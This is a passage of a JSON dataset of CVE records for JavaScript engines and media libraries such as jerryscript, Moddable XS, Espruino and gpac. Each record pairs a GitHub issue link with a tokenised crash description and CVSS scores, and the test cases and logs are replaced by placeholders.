  76617. "description": "Null Pointer Dereference in gf_sg_destroy_routes\uff08\uff09at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt ERRORTAG",
  76618. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76619. "severity": "MEDIUM",
  76620. "baseScore": 5.5,
  76621. "impactScore": 3.6,
  76622. "exploitabilityScore": 1.8
  76623. },
  76624. {
  76625. "CVE_ID": "CVE-2021-46313",
  76626. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2039",
  76627. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2039",
  76628. "Repo_new": "gpac/gpac",
  76629. "Issue_Created_At": "2022-01-09T07:07:05Z",
  76630. "description": "A segmentation fault in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76631. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76632. "severity": "MEDIUM",
  76633. "baseScore": 5.5,
  76634. "impactScore": 3.6,
  76635. "exploitabilityScore": 1.8
  76636. },
  76637. {
  76638. "CVE_ID": "CVE-2021-46322",
  76639. "Issue_Url_old": "https://github.com/svaarala/duktape/issues/2448",
  76640. "Issue_Url_new": "https://github.com/svaarala/duktape/issues/2448",
  76641. "Repo_new": "svaarala/duktape",
  76642. "Issue_Created_At": "2022-01-10T03:47:30Z",
  76643. "description": "An SEGV issue detected when compiled with UBSAN. Duktape revision Commit NUMBERTAG a1b NUMBERTAG ef URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG Execution without ASAN APITAG",
  76644. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76645. "severity": "MEDIUM",
  76646. "baseScore": 5.5,
  76647. "impactScore": 3.6,
  76648. "exploitabilityScore": 1.8
  76649. },
  76650. {
  76651. "CVE_ID": "CVE-2021-46323",
  76652. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2122",
  76653. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2122",
  76654. "Repo_new": "espruino/espruino",
  76655. "Issue_Created_At": "2021-12-21T14:03:50Z",
  76656. "description": "SEGV APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76657. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76658. "severity": "MEDIUM",
  76659. "baseScore": 5.5,
  76660. "impactScore": 3.6,
  76661. "exploitabilityScore": 1.8
  76662. },
  76663. {
  76664. "CVE_ID": "CVE-2021-46324",
  76665. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2121",
  76666. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2121",
  76667. "Repo_new": "espruino/espruino",
  76668. "Issue_Created_At": "2021-12-21T13:15:35Z",
  76669. "description": "Stack buffer overflow APITAG in APITAG Espruino revision Commit NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76671. "severity": "HIGH",
  76672. "baseScore": 7.8,
  76673. "impactScore": 5.9,
  76674. "exploitabilityScore": 1.8
  76675. },
  76676. {
  76677. "CVE_ID": "CVE-2021-46325",
  76678. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/2114",
  76679. "Issue_Url_new": "https://github.com/espruino/espruino/issues/2114",
  76680. "Repo_new": "espruino/espruino",
  76681. "Issue_Created_At": "2021-12-15T08:17:55Z",
  76682. "description": "stack buffer overflow APITAG in vcbprintf. Espruino revision Commit NUMBERTAG a9f NUMBERTAG a0 URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76683. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76684. "severity": "HIGH",
  76685. "baseScore": 7.8,
  76686. "impactScore": 5.9,
  76687. "exploitabilityScore": 1.8
  76688. },
  76689. {
  76690. "CVE_ID": "CVE-2021-46326",
  76691. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/759",
  76692. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/759",
  76693. "Repo_new": "moddable-opensource/moddable",
  76694. "Issue_Created_At": "2021-12-28T09:45:33Z",
  76695. "description": "Heap buf overflow ( PATHTAG ) in __asan_memcpy. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG No ASAN Output APITAG",
  76696. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76697. "severity": "HIGH",
  76698. "baseScore": 7.8,
  76699. "impactScore": 5.9,
  76700. "exploitabilityScore": 1.8
  76701. },
  76702. {
  76703. "CVE_ID": "CVE-2021-46327",
  76704. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/766",
  76705. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/766",
  76706. "Repo_new": "moddable-opensource/moddable",
  76707. "Issue_Created_At": "2022-01-07T16:05:55Z",
  76708. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76709. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76710. "severity": "MEDIUM",
  76711. "baseScore": 5.5,
  76712. "impactScore": 3.6,
  76713. "exploitabilityScore": 1.8
  76714. },
  76715. {
  76716. "CVE_ID": "CVE-2021-46328",
  76717. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/751",
  76718. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/751",
  76719. "Repo_new": "moddable-opensource/moddable",
  76720. "Issue_Created_At": "2021-12-14T02:49:38Z",
  76721. "description": "Heap buffer overflow in __libc_start_main. Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76722. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76723. "severity": "HIGH",
  76724. "baseScore": 7.8,
  76725. "impactScore": 5.9,
  76726. "exploitabilityScore": 1.8
  76727. },
  76728. {
  76729. "CVE_ID": "CVE-2021-46329",
  76730. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/768",
  76731. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/768",
  76732. "Repo_new": "moddable-opensource/moddable",
  76733. "Issue_Created_At": "2022-01-07T16:08:53Z",
  76734. "description": "SEGV ( PATHTAG ) in _fini. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76735. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76736. "severity": "MEDIUM",
  76737. "baseScore": 5.5,
  76738. "impactScore": 3.6,
  76739. "exploitabilityScore": 1.8
  76740. },
  76741. {
  76742. "CVE_ID": "CVE-2021-46330",
  76743. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/774",
  76744. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/774",
  76745. "Repo_new": "moddable-opensource/moddable",
  76746. "Issue_Created_At": "2022-01-10T02:55:10Z",
  76747. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76748. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76749. "severity": "MEDIUM",
  76750. "baseScore": 5.5,
  76751. "impactScore": 3.6,
  76752. "exploitabilityScore": 1.8
  76753. },
  76754. {
  76755. "CVE_ID": "CVE-2021-46331",
  76756. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/750",
  76757. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/750",
  76758. "Repo_new": "moddable-opensource/moddable",
  76759. "Issue_Created_At": "2021-12-14T02:18:16Z",
  76760. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76761. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76762. "severity": "MEDIUM",
  76763. "baseScore": 5.5,
  76764. "impactScore": 3.6,
  76765. "exploitabilityScore": 1.8
  76766. },
  76767. {
  76768. "CVE_ID": "CVE-2021-46332",
  76769. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/752",
  76770. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/752",
  76771. "Repo_new": "moddable-opensource/moddable",
  76772. "Issue_Created_At": "2021-12-15T05:06:41Z",
  76773. "description": "Heap buffer overflow PATHTAG in APITAG Moddable XS revision Commit: db8f NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output ERRORTAG",
  76774. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76775. "severity": "HIGH",
  76776. "baseScore": 7.8,
  76777. "impactScore": 5.9,
  76778. "exploitabilityScore": 1.8
  76779. },
  76780. {
  76781. "CVE_ID": "CVE-2021-46332",
  76782. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/749",
  76783. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/749",
  76784. "Repo_new": "moddable-opensource/moddable",
  76785. "Issue_Created_At": "2021-12-13T06:51:03Z",
  76786. "description": "APITAG SEGV PATHTAG in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG description asan log ERRORTAG release crash CODETAG",
  76787. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76788. "severity": "HIGH",
  76789. "baseScore": 7.8,
  76790. "impactScore": 5.9,
  76791. "exploitabilityScore": 1.8
  76792. },
  76793. {
  76794. "CVE_ID": "CVE-2021-46333",
  76795. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/769",
  76796. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/769",
  76797. "Repo_new": "moddable-opensource/moddable",
  76798. "Issue_Created_At": "2022-01-07T16:10:20Z",
  76799. "description": "Negative size param ( PATHTAG ) in __asan_memmove. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG Execution & Output ERRORTAG No ASAN Output APITAG",
  76800. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76801. "severity": "MEDIUM",
  76802. "baseScore": 5.5,
  76803. "impactScore": 3.6,
  76804. "exploitabilityScore": 1.8
  76805. },
  76806. {
  76807. "CVE_ID": "CVE-2021-46334",
  76808. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/760",
  76809. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/760",
  76810. "Repo_new": "moddable-opensource/moddable",
  76811. "Issue_Created_At": "2021-12-28T10:22:58Z",
  76812. "description": "A weird stack overflow when compiled with ASAN. Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution & Output with ASAN ERRORTAG ` No ASAN Output ERRORTAG",
  76813. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  76814. "severity": "HIGH",
  76815. "baseScore": 7.8,
  76816. "impactScore": 5.9,
  76817. "exploitabilityScore": 1.8
  76818. },
  76819. {
  76820. "CVE_ID": "CVE-2021-46335",
  76821. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/748",
  76822. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/748",
  76823. "Repo_new": "moddable-opensource/moddable",
  76824. "Issue_Created_At": "2021-12-13T06:47:02Z",
  76825. "description": "APITAG Null pointer dereference in APITAG Build environment operating system: ubuntu NUMBERTAG cimmit hash: APITAG compile command: APITAG test command: APITAG poc ERRORTAG asan log ERRORTAG release log CODETAG",
  76826. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76827. "severity": "MEDIUM",
  76828. "baseScore": 5.5,
  76829. "impactScore": 3.6,
  76830. "exploitabilityScore": 1.8
  76831. },
  76832. {
  76833. "CVE_ID": "CVE-2021-46335",
  76834. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/767",
  76835. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/767",
  76836. "Repo_new": "moddable-opensource/moddable",
  76837. "Issue_Created_At": "2022-01-07T16:07:28Z",
  76838. "description": "SEGV PATHTAG in APITAG Moddable XS revision Commit NUMBERTAG f NUMBERTAG df NUMBERTAG URLTAG Version NUMBERTAG Build environment Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution & Output ERRORTAG",
  76839. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76840. "severity": "MEDIUM",
  76841. "baseScore": 5.5,
  76842. "impactScore": 3.6,
  76843. "exploitabilityScore": 1.8
  76844. },
  76845. {
  76846. "CVE_ID": "CVE-2021-46336",
  76847. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4927",
  76848. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4927",
  76849. "Repo_new": "jerryscript-project/jerryscript",
  76850. "Issue_Created_At": "2022-01-04T06:06:49Z",
  76851. "description": "Assertion 'opts & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76852. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76853. "severity": "MEDIUM",
  76854. "baseScore": 5.5,
  76855. "impactScore": 3.6,
  76856. "exploitabilityScore": 1.8
  76857. },
  76858. {
  76859. "CVE_ID": "CVE-2021-46337",
  76860. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4930",
  76861. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4930",
  76862. "Repo_new": "jerryscript-project/jerryscript",
  76863. "Issue_Created_At": "2022-01-04T06:09:14Z",
  76864. "description": "Assertion 'page_p != NULL' failed at PATHTAG (parser_list_get NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76865. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76866. "severity": "MEDIUM",
  76867. "baseScore": 5.5,
  76868. "impactScore": 3.6,
  76869. "exploitabilityScore": 1.8
  76870. },
  76871. {
  76872. "CVE_ID": "CVE-2021-46338",
  76873. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4900",
  76874. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4900",
  76875. "Repo_new": "jerryscript-project/jerryscript",
  76876. "Issue_Created_At": "2021-12-13T08:54:30Z",
  76877. "description": "Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma helpers.c (ecma_get_lex_env_type).. APITAG revision Commit NUMBERTAG bd6 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG ASAN closed Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  76878. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76879. "severity": "MEDIUM",
  76880. "baseScore": 5.5,
  76881. "impactScore": 3.6,
  76882. "exploitabilityScore": 1.8
  76883. },
  76884. {
  76885. "CVE_ID": "CVE-2021-46339",
  76886. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4935",
  76887. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4935",
  76888. "Repo_new": "jerryscript-project/jerryscript",
  76889. "Issue_Created_At": "2022-01-04T06:17:32Z",
  76890. "description": "Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case FILETAG Execution steps & Output ERRORTAG",
  76891. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76892. "severity": "MEDIUM",
  76893. "baseScore": 5.5,
  76894. "impactScore": 3.6,
  76895. "exploitabilityScore": 1.8
  76896. },
  76897. {
  76898. "CVE_ID": "CVE-2021-46340",
  76899. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4924",
  76900. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4924",
  76901. "Repo_new": "jerryscript-project/jerryscript",
  76902. "Issue_Created_At": "2022-01-04T06:04:22Z",
  76903. "description": "Assertion 'context_p >stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p >stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76904. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76905. "severity": "MEDIUM",
  76906. "baseScore": 5.5,
  76907. "impactScore": 3.6,
  76908. "exploitabilityScore": 1.8
  76909. },
  76910. {
  76911. "CVE_ID": "CVE-2021-46342",
  76912. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4934",
  76913. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4934",
  76914. "Repo_new": "jerryscript-project/jerryscript",
  76915. "Issue_Created_At": "2022-01-04T06:13:59Z",
  76916. "description": "Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76917. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76918. "severity": "MEDIUM",
  76919. "baseScore": 5.5,
  76920. "impactScore": 3.6,
  76921. "exploitabilityScore": 1.8
  76922. },
  76923. {
  76924. "CVE_ID": "CVE-2021-46343",
  76925. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4921",
  76926. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4921",
  76927. "Repo_new": "jerryscript-project/jerryscript",
  76928. "Issue_Created_At": "2022-01-04T06:02:03Z",
  76929. "description": "Assertion 'context_p APITAG == LEXER_LITERAL' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76930. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76931. "severity": "MEDIUM",
  76932. "baseScore": 5.5,
  76933. "impactScore": 3.6,
  76934. "exploitabilityScore": 1.8
  76935. },
  76936. {
  76937. "CVE_ID": "CVE-2021-46344",
  76938. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4928",
  76939. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4928",
  76940. "Repo_new": "jerryscript-project/jerryscript",
  76941. "Issue_Created_At": "2022-01-04T06:07:34Z",
  76942. "description": "Assertion 'flags & APITAG failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76943. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76944. "severity": "MEDIUM",
  76945. "baseScore": 5.5,
  76946. "impactScore": 3.6,
  76947. "exploitabilityScore": 1.8
  76948. },
  76949. {
  76950. "CVE_ID": "CVE-2021-46345",
  76951. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4920",
  76952. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4920",
  76953. "Repo_new": "jerryscript-project/jerryscript",
  76954. "Issue_Created_At": "2022-01-04T06:01:01Z",
  76955. "description": "Assertion 'cesu8_cursor_p == cesu8_end_p' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76956. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76957. "severity": "MEDIUM",
  76958. "baseScore": 5.5,
  76959. "impactScore": 3.6,
  76960. "exploitabilityScore": 1.8
  76961. },
  76962. {
  76963. "CVE_ID": "CVE-2021-46346",
  76964. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4939",
  76965. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4939",
  76966. "Repo_new": "jerryscript-project/jerryscript",
  76967. "Issue_Created_At": "2022-01-04T06:20:47Z",
  76968. "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG . APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76969. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76970. "severity": "MEDIUM",
  76971. "baseScore": 5.5,
  76972. "impactScore": 3.6,
  76973. "exploitabilityScore": 1.8
  76974. },
  76975. {
  76976. "CVE_ID": "CVE-2021-46347",
  76977. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4938",
  76978. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4938",
  76979. "Repo_new": "jerryscript-project/jerryscript",
  76980. "Issue_Created_At": "2022-01-04T06:20:03Z",
  76981. "description": "Assertion APITAG (obj_p)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  76982. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76983. "severity": "MEDIUM",
  76984. "baseScore": 5.5,
  76985. "impactScore": 3.6,
  76986. "exploitabilityScore": 1.8
  76987. },
  76988. {
  76989. "CVE_ID": "CVE-2021-46348",
  76990. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4941",
  76991. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4941",
  76992. "Repo_new": "jerryscript-project/jerryscript",
  76993. "Issue_Created_At": "2022-01-04T06:22:36Z",
  76994. "description": "Assertion APITAG (string_p)' failed at PATHTAG (ecma_free_string_list NUMBERTAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b \u200b Execution steps & Output ERRORTAG",
  76995. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76996. "severity": "MEDIUM",
  76997. "baseScore": 5.5,
  76998. "impactScore": 3.6,
  76999. "exploitabilityScore": 1.8
  77000. },
  77001. {
  77002. "CVE_ID": "CVE-2021-46349",
  77003. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4937",
  77004. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4937",
  77005. "Repo_new": "jerryscript-project/jerryscript",
  77006. "Issue_Created_At": "2022-01-04T06:19:15Z",
  77007. "description": "Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77008. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77009. "severity": "MEDIUM",
  77010. "baseScore": 5.5,
  77011. "impactScore": 3.6,
  77012. "exploitabilityScore": 1.8
  77013. },
  77014. {
  77015. "CVE_ID": "CVE-2021-46350",
  77016. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4936",
